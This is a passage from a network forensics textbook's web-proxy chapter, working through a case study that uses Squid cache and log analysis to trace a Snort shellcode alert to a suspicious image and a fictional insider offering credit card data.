We know that the URI of the cached web object that triggered the original Snort alert was “http://www.evil.evl/pwny.jpg.” Let’s see if we can use this key to look up the corresponding entry in access.log:

$ grep 'http://www.evil.evl/pwny.jpg' access-192.168.1.169.log
1305730905.602 45 192.168.1.169 TCP_MISS/200 1087 GET http://www.evil.evl
/pwny.jpg - DIRECT/172.16.16.218 image/jpeg

From this, we can see that the JPEG was requested at 1305730905.602, or Wed May 18 15:01:45 UTC 2011.

Let’s take a peek at the browsing history originating from 192.168.1.169. Scrolling through the file access-192.168.1.169.log, here are some of the more interesting URIs, organized by category:

• Resigning and looking for a new job

http://jobsearch.about.com/cs/careerresources/a/resign.htm
http://jobsearch.about.com/od/resignationletters/a/resignemail.htm
http://jobsearch.about.com/cs/cooljobs/a/dreamjob.htm
http://0.tqn.com/d/jobsearch/1/G/T/L/iquit.jpg
http://monster.com/

• Money

http://www.walletpop.com/photos/25-ways-to-make-quick-money/
http://sketchy.evl/wp-content/themes/GreenMoney/images/money.jpg
http://www.wired.com/threatlevel/2011/05/carders/

• Travel

http://www.expatexchange.com/vietnam/liveinvietnam.html
http://wiki.answers.com/Q/What_countries_have_non-extradition

• Data destruction

http://www.zdnet.com/blog/storage/how-to-really- erase-a-hard-drive/129

How did we know that the domain “http://www.wired.com/threatlevel/2011/05/carders/” was related to money? There is another URI in the browsing history, shown below:

This URI is designed to track the user’s web browsing activity. When embedded in a web page, this URI causes the client’s browser to send a request to the third party at “http://bcp.crwdcntrl.net.” According to Abine, “the online privacy company,” “crwdcntrl.net is a domain used by Lotame which is an advertising company that is part of a network of sites, cookies, and other technologies used to track you....”⁴⁰

40. “Abine,” 2011, http://www.abine.com/trackers/crwdcntrl.net.php.

Notice that a site that the user visited, “http://www.wired.com/threatlevel/2011/05/carders/,” was included as part of the request to crwdcntrl.net (it was URL-encoded twice before insertion). The article’s title, “Chat Log: What It Looks Like When Hackers Sell Your Credit Card Online,” was also included in the tracking URI. Handy! We would not have recovered that information from the original URI request record in access.log.

Third-party tracking of web surfing activities has become ubiquitous and very detailed. In addition to sending detailed information to third-party advertisers, trackers can leave extra information in web proxy logs, as well. Forensic investigators can take advantage of these extra “Easter eggs” and gather supplemental data from them for use in an investigation.

10.8.4 Further Squid Cache Analysis

Up to this point, we have found two domains that are directly linked to the event that triggered the original Snort NIDS alert, “SHELLCODE x86 NOOP”:

• evil.evl—The domain that hosted pwny.jpg, the image that triggered the original Snort alert, “SHELLCODE x86 NOOP.”

• sketchy.evl—The domain which contained a link to http://www.evil.evl/pwny.jpg.

Let’s search the Squid cache to see if we can find any other pages that are related to these domains, and use squid_extract_v01.pl to automatically extract the contents.

$ for cache_file in `grep -lir 'sketchy.evl|evil.evl' squid`; do
squid_extract_v01.pl -f $cache_file -o squid-extract-evl/; done

$ ls squid-extract-evl/
extract_log.txt sketchy.evl www.evil.evl www.hyperpromote.com

It appears that the cache contains pages from three domains that contain references to sketchy.evl or evil.evl. Here is selected output from extract_log.txt:

Extracting http://sketchy.evl/?p=3
Extracting http://www.evil.evl/pwny.jpg
Extracting http://sketchy.evl/wp-includes/images/smilies/icon_wink.gif
Extracting http://sketchy.evl/wp-login.php
Extracting http://sketchy.evl/wp-admin/wp-admin.css?version=2.3.3
Extracting http://sketchy.evl/wp-admin/images/login-bkg-tile.gif
Extracting http://sketchy.evl/wp-admin/images/fade-butt.png
Extracting http://sketchy.evl/wp-admin/images/login-bkg-bottom.gif
Extracting http://sketchy.evl/wp-admin/profile.php
Extracting http://sketchy.evl/wp-includes/js/fat.js?ver=1.0-RC1_3660
Extracting http://sketchy.evl/wp-admin/images/browse-happy.gif
Extracting http://sketchy.evl/wp-admin/images/heading-bg.gif
Extracting http://sketchy.evl/wp-admin/images/logo-ghost.png
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/feed-icon
   -12x12.png
Extracting http://sketchy.evl/
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/style.css
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/bg.png
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/logo-sketch
   .png
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/money.jpg
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/rss.gif
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/advertise.
   gif
Extracting http://sketchy.evl/wp-content/themes/GreenMoney/images/arrow.gif
Extracting http://sketchy.evl/?page_id=2
Extracting http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&
   bvlocationcode=272892&bvurl=http://sketchy.evl/?page_id=2&bvtitle=About
   %20%3A%20sKetchy%20Kredit
Extracting http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&
   bvlocationcode=272892&bvurl=http://sketchy.evl/?page_id=2&bvtitle=About
   %20%3A%20sKetchy%20Kredit
Extracting http://sketchy.evl/?page_id=4
Extracting http://sketchy.evl/?page_id=4#comment-7

From the output of extract_log.txt, we can see that the overwhelming majority of extracted pages are from the sketchy.evl domain. The sketchy.evl server appears to be hosting a Wordpress web site, which we can tell by the presence of default Wordpress files and directories such as “wp-login.php” and “wp-content.”

There appears to be only one object from the evil.evl domain (the download of pwny.jpg), and there are two objects from “hyperpromote.com,” which judging by the name and URI are likely related to advertising and activity tracking.

Let’s examine a few pages that seem interesting. Figure 10-22 shows the page: http://sketchy.evl/?page_id=2

Figure 10-22 The page http://sketchy.evl/?page_id=2, extracted from the Squid cache and viewed offline in a web browser.

From the “About” tag and the page content, it appears that this page is designed to provide information about an organization called “sKetchy Kredit,” which is “your #1 source for all credit card recycling needs.” Apparently they are based in a “sunny, overseas location.” Interestingly, the page indicates that a user called “N. Phil Trader” was logged in when the page was cached.

What time was the page “http://sketchy.evl/?page_id=2” retrieved? The answer is not obvious because the variable “page_id=2” that differentiates this page from others is not included in access.log or store.log. However, we can extract the hash used to index files in the cache from the corresponding cache file (000005B9), and then match this hash to a line in store.log.

Figure 10-23 shows the cache file (000005B9) from which squid_extract_v01.pl carved out “http://sketchy.evl/?page_id=2.” Notice the URI in the ASCII text in the right-hand column. You can also see the “Date” listed in the HTTP headers sent by the server: Wed, 18 May 2011 15:03:36 GMT. Finally, we have highlighted the hash value in the Squid metadata, 88D70371DB405AC6D7FA291B36E6B594.

Figure 10-23 The cache file (000005B9) from which squid_extract_v01.pl carved out “http://sketchy.evl/?page_id=2.” We have highlighted the hash value in the Squid metadata, 88D70371DB405AC6D7FA291B36E6B594.

Next, we can use the hash to extract the corresponding value from store.log:

$ grep 88D70371DB405AC6D7FA291B36E6B594 store.log
1305731016.113 SWAPOUT 00 000005B9 88D70371DB405AC6D7FA291B36E6B594  200
    1305731016 1305731016 1305731016 text/html -1/8185 GET http://sketchy.evl
    /?

From this, we can see that the page was cached at 1305731016.113, which translates to “Wed May 18 15:03:36 UTC 2011.” This value, set by the internal web proxy www-proxy.example.com, corresponds precisely with the time in the HTTP headers set by the suspicious remote server—a good sign that the time on the remote server was accurate when this page was cached.

Figure 10-24 shows the contents of http://sketchy.evl/?page_id=4, carved from the Squid cache and displayed offline in a web browser. This page urges the reader to “send us your database” of credit card numbers in exchange for payment. It appears that the same user, “N. Phil Trader,” was logged in when this page was cached, and has even posted a comment that is awaiting moderation (in other words, if we simply visited the web site from a different system, we would not see this comment unless the administrator had chosen to approve it!).

Figure 10-24 The page http://sketchy.evl/?page_id=4, extracted from the Squid cache and viewed offline in a web browser.

Based on the values in the page, the comment appeared to have been posted on May 18, 2011, at 10:05 AM (of course, we do not know the time zone and cannot rely on the suspicious remote web server for accuracy). The content implies that “phil” has access to credit card data and he is interested in finding out how much it is worth.

Once again, we can use the hash value from the cache file (squid/00/05/000005BE) to look up the corresponding entry in store.log, as shown below:

$ grep 062208B432C7EB85E1C96BF25EA0ED04 store.log
1305731045.257 SWAPOUT 00 000005BE 062208B432C7EB85E1C96BF25EA0ED04  200
    1305731045 1305731045 1305731045 text/html -1/8500 GET http://sketchy.evl
    /?

From this, we see that the page http://sketchy.evl/?page_id=4 was cached at 1305731045.257, which corresponds with Wed May 18 15:04:05 UTC 2011.

Who is this “N. Phil Trader”? Browsing through the extracted Squid cache pages, we come across Wordpress’ “profile.php” page. What luck! This Wordpress page normally contains information about users.

In the access.log file, we see a corresponding entry for “http://sketchy.evl/wp-admin/profile.php,” as shown below:

1305730955.740 200 192.168.1.169 TCP_MISS/200 5612 GET http://sketchy.evl/
wp-admin/profile.php - DIRECT/172.16.16.217 text/html

The access time, 1305730955.740, translates to “Wed May 18 15:02:35 UTC 2011.” Opening the extracted cache contents in an offline web browser, as shown in Figure 10-25, we see details about this user’s account! The email address “[email protected]” indicates that the user has an email account at MacDaddy Payment Processor (since the local domain is example.com). Presumably, local staff will be able to identify this user.

Figure 10-25 The page http://sketchy.evl/wp-admin/profile.php, extracted from the Squid cache and viewed offline in a web browser.

10.8.5 Timeline

Based on the evidence we have recovered, let’s put together a timeline of events. As always, this timeline is just a hypothesis based on our analysis up to this point.

This timeline is for events that occurred on May 18, 2011. Note that we have included information gleaned from our earlier Snort analysis as well (see Chapter 7 for details). The times listed below are in UTC:

• 14:43:18—First entry in the Squid access.log file from www-proxy.example.com.

• 14:44:43—First entry relating to 192.168.1.169 in the Squid access.log file from www-proxy.example.com.

• 14:45:09—NIDS alerts for 192.168.1.169 begin (from the alert file). Though these initial alerts—for web bug downloads—do not themselves indicate any particularly adverse behavior, they do serve to establish a known commencement of web browsing activity by 192.168.1.169.

• 15:01:45—NIDS alert for possible shellcode being downloaded by 192.168.1.169 from an unknown external web server (from the alert file). This is the NIDS alert that was the impetus for our investigation.

• 15:01:45—The user of 192.168.1.169 downloaded http://www.evil.evl/pwny.jpg.

• 15:02:35—The user of 192.168.1.169 visited http://sketchy.evl/wp-admin/profile.php.

• 15:03:36—The user of 192.168.1.169 visited http://sketchy.evl/?page_id=2.

• 15:04:05—The user of 192.168.1.169 visited http://sketchy.evl/?page_id=4.

• 15:04:28–15:04:38—Multiple NIDS alerts (18) report crafted packets from 192.168.1.169 to multiple internal hosts (from the alert file).

• 15:15:08—NIDS alerts for 192.168.1.169 end (from the alert file). The end of the web bug download alerts does not definitively indicate that 192.168.1.169 has ceased to be active on the network, but it does at least indicate a possible change in the operator’s web browsing activities.

• 15:15:25—Last entry in the Squid access.log file from www-proxy.example.com. Also the last entry that relates to 192.168.1.169.

10.8.6 Theory of the Case

Now let’s summarize our theory of the case. This is just a working hypothesis supported by the evidence, references, and experiences:

• From at least 14:44:43 until at least 15:15:25 on 5/18/11, internal host 192.168.1.169 was used to browse external web sites, some of which delivered web bugs that were detected and logged.

• The user of 192.168.1.169 visited sites that were related to the following topics:

– Resigning and looking for a new job

– Money

– Travel (specifically to nonextradition countries)

– Data destruction

Taken together, we can hypothesize that the user of 192.168.1.169 may not be happy with his job at MacDaddy Payment Processor, and may be looking for other ways to make money (including some that are illegal).

• The user of 192.168.1.169 visited http://sketchy.evl(172.16.16.217:80). This site appeared to be engaged in credit card number theft, encouraging readers to send in their companies’ credit card databases in exchange for money.

• A page on http://sketchy.evl contained a comment posted by someone calling themselves “l0ser.” This comment contained a nearly invisible 5×5 pixel iFrame with a link to pwny.jpg. When the web browser on 192.168.1.169 loaded the page with the comment, it automatically downloaded the suspicious file, pwny.jpg. The user of 192.168.1.169 probably had no idea that pwny.jpg was downloaded.

• We were able to carve the same suspicious jpg (pwny.jpg) out of both the Snort packet capture and the Squid web proxy cache. The MD5sum of the suspicious JPEG was: 13c303f746a0e8826b749fce56a5c126

• The web site sketchy.evl had a user account with the name and email address of a local employee, N. Phil Trader ([email protected]). This user attempted to post a comment indicating that he had access to credit card data, and he wanted to know how much it was worth. If N. Phil Trader is also the user of 192.168.1.169, this comment would fit with the web surfing activity profile we have already seen relating to 192.168.1.169.

• At 15:04:28, internal host 192.168.1.169 spent roughly 10 seconds sending crafted packets to other internal hosts on the 192.168.1.0/24 network. Based on their nonstandard nature, the packets are consistent with those used to conduct reconnaissance via scanning and operating system fingerprinting. This activity may have been deliberately conducted by the user of 192.168.1.169; or it is also possible the client was compromised by a remote system and used as a pivot point for further attacks from the outside. Given the user’s web surfing history, the client may have been compromised through a web browser vulnerability. The suspicious file pwny.jpg could have been part of an exploit.

10.8.7 Response to Challenge Questions

• Examine the Squid cache and extract any cached pages/files associated with the Snort alert shown above. The Snort alert was triggered by the following image: http://www.evil.evl/pwny.jpg

We analyzed the Squid cache and found that this image was included in an iFrame in the following page: http://sketchy.evl/?p=3

We extracted both of these web objects from the Squid cache, and then used squid_extract_v01.pl within a Bash “for” loop to automatically extract all web objects that related to either sketchy.evl or evil.evl.

• Determine whether the evidence extracted from the Squid cache corroborates our findings from the Snort logs. Yes, the evidence from the Squid cache correlates very well with the evidence we found in the Snort proxy. For example, we were able to carve “pwny.jpg” from both the Snort packet capture and the Squid web cache, and it had the same cryptographic checksum both times.

In addition, the times of important events logged in both Snort and Squid match up. For example, in the Snort logs, we saw a NIDS alert for “SHELLCODE x86 NOOP” at 15:01:45 UTC, which we later discovered was triggered by the image pwny.jpg. In the Squid cache, we found that the URI http://www.evil.evl/pwny.jpg was requested at the same time, 15:01:45 UTC.

• Based on web proxy access logs, gather information about the client system 192.168.1.169, including its likely operating system and the apparent interests of any users. Based on the contents of access.log, the client 192.168.1.169 is probably a Microsoft Windows system. The user’s web surfing activity indicates interest in:

– Resigning and looking for a new job

– Money

– Travel (specifically to nonextradition countries)

– Data destruction

• Present any information you can find regarding the identity of any internal users who have been engaged in suspicious activities.

From the user profile on http://sketchy.evl, we have gathered the following identifying information:

– Username: philt

– First name: N. Phil

– Last name: Trader

– Nick name: philt

– Display name: N. Phil Trader

– Email address: [email protected]

This user also attempted to leave a comment on the web site http://sketchy.evl, which was as follows:

how much r u offering per card right now?

plz let me know. i have a bunch. thx, phil

10.8.8 Next Steps

Now that we’ve analyzed both the Snort NIDS server and the local Squid web proxy, what are some appropriate next steps?

• Central Log Server We have a record of activities relating to the client 192.168.1.169, but who was logged into the system at the time? The central logging server may have authentication logs from local workstations that shed light on the account used at the time under investigation.

We also have indications that an insider may be preparing to disclose records from the company’s credit card database. The central logging server may include database application logs and server logs that could allow investigators to determine when and how the credit card information was accessed, and by whom.

The central logging server may also be useful for tracking down the client itself, 192.168.1.169. If this is a DHCP address, DHCP server logs would hopefully include mappings between this IP address and a network card address. Network equipment logs may indicate which port the network card was plugged into.

• Video Surveillance/Physical Access Logs It’s all well and good to have authentication logs that indicate that a specific account was in use on 192.168.1.169, but how can we be sure that the account credentials were not stolen? Whenever possible, it is a good idea to corroborate with local video surveillance and physical access logs. These can help investigators determine who was actually sitting at the console at the time under investigation.

• Hard Drive Analysis Once the client 192.168.1.169 has been acquired, hard drive analysis would be useful for determining precisely what happened. Why did 192.168.1.169 begin conducting reconnaissance on the local network? Did the local user deliberately install an application such as nmap? Is the system infected with malware? Was the client exploited through a browser vulnerability and then used as a pivot point by an external attacker? Hard drive analysis may not reveal anything more than network forensics has already unearthed, or it may reveal additional findings. At a minimum, we are likely to find evidence corroborating our findings so far, which strengthens our case.

• Malware Analysis We can provide samples of the suspicious files we have uncovered to professional malware analysts. This can help us create NIDS and/or antivirus signatures for identifying the malware elsewhere on our network, determine the purpose and function of the malware, and scope the extent of the potential breach.

• Human Resources Since an internal employee, N. Phil Trader ([email protected]), has been implicated in suspicious activities, it would normally be appropriate to notify human resources staff and work with them as the investigation progresses. Typically, human resources can provide guidance for monitoring efforts, broker interviews with the employee under investigation, and manage suspension or termination events should they be necessary. Consultation with legal counsel may also be appropriate. Professional human resources staff can help to manage the human element of the investigation; minimizing the risk that a truly malicious insider will cause further damage and helping to ensure that all employees are treated fairly.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for Chapter 10. Web Proxies

Create new playlist

Sign In

Sign Up

Chapter 10. Web Proxies

10.1 Why Investigate Web Proxies?

10.2 Web Proxy Functionality

10.2.1 Caching

10.2.1.1 Expiration

10.2.1.2 Validation

10.2.2 URI Filtering

10.2.3 Content Filtering

10.2.4 Distributed Caching

10.2.4.1 Internet Cache Protocol (ICP)

10.2.4.2 Internet Content Adaptation Protocol (ICAP)

10.3 Evidence

10.3.1 Types of Evidence

10.3.1.1 Persistent

10.3.1.2 Volatile

10.3.1.3 Off-System

10.3.2 Obtaining Evidence

10.4 Squid

10.4.1 Squid Configuration

10.4.2 Squid Access Logfile

10.4.3 Squid Cache

10.4.3.1 Disk Cache

10.4.3.2 swap.state

10.4.3.3 Keys

10.4.3.4 Memory Cache

10.5 Web Proxy Analysis

10.5.1 Web Proxy Log Analysis Tools

10.5.1.1 Internet Access Monitor

10.5.1.2 Blue Coat Reporter

10.5.1.3 Squidview

10.5.1.4 SARG

10.5.1.5 Splunk

10.5.1.6 Shell

10.5.2 Example: Dissecting a Squid Disk Cache

10.5.2.1 Extracting a Cached Web Object

10.5.2.2 Automated Squid Cache Extraction

10.6 Encrypted Web Traffic

10.6.1 Transport Layer Security (TLS)

10.6.1.1 How TLS/SSL Works

10.6.2 Gaining Access to Encrypted Content

10.6.2.1 Server’s Private Key

Wireshark

10.6.2.2 Intercepting Proxy

Sslstrip

10.6.3 Commercial TLS/SSL Interception Tools

10.7 Conclusion

10.8 Case Study: InterOptic Saves the Planet (Part 2 of 2)

10.8.1 Analysis: pwny.jpg

10.8.2 Squid Cache Page Extraction

10.8.3 Squid Access.log File

10.8.4 Further Squid Cache Analysis

10.8.5 Timeline

10.8.6 Theory of the Case

10.8.7 Response to Challenge Questions

10.8.8 Next Steps

Table of Contents for
Chapter 10. Web Proxies